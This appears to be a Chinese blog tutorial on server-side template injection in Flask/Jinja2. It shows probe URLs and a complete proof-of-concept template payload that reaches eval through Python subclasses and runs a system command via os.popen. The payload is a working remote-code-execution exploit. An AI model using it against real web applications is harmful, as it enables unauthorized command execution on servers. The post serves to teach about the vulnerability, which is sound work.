Flask(Jinja2) 服务端模板注入漏洞

小时候是个乖乖

 关注

阅读 61

2022-03-18

先来看一下代码:

在浏览器中输入

http://your-ip:8000/?name=aaa

会出现 hello aaa

在name后面也可以输入其他东西,比如:

http://192.168.147.139:8000/?name={{123*123}}

 http://your-ip/?name={{'aaa'.upper()}}

 任意命令执行的方法,需要在python里要执行系统命令需要import os模块。

想要在模板中直接调用内置模块 os,即需要在模板环境中对其注册

需要在代码里加一句:

t.globals['os'] = os

 漏洞利用的poc

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

相关推荐

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

phpworkerman 41 0 0

SSTI模板注入(jinja2)

玉字璧 28 0 0

Flask 使用Jinja2模板引擎

niboac 78 0 0

【flask】 Jinja2

海滨公园 95 0 0

jinja2模板

王远洋 87 0 0

【Web】Flask|Jinja2 SSTI

钵仔糕的波波仔 43 0 0

【Python】Web学习笔记_flask(7)——Jinja2模板(1)

小布_cvg 61 0 0

【django】配置Jinja2模板引擎【2】

夕颜合欢落 76 0 0

Ansible Jinja2 模板概述 --01

M4Y 60 0 0

Flask Jinja2 模板中的变量和过滤器

开源分享 110 0 0

精彩评论(0)

0 0 举报